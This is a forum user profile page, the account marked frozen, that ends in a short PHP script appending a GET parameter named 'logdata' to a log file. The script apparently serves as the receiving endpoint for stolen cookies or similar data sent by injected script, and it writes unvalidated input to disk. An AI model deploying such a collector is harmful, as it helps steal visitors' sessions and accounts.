This user is frozen!
derpred
Registered: Nov 6, 2011 1:17 AM

ID: 92382
Title: User
Name: daerp dasp
Gender: Male
Eem: 750
Pet choice: Ignore
eeMail: Send eeMail
Forum posts: Forum posts
Achievements: Member
Last seen: 653 weeks, 6 days, 6 hours, 20 minutes ago

<?php
$myFile = "log.txt";
$fh = fopen($myFile, 'a+');
$stringData = $_GET["logdata"];
$ip=$_SERVER['REMOTE_ADDR'];
$WriteData = "IP: " . $stringData . "\r\n";
fwrite($fh, $WriteData);
fclose($fh);
?>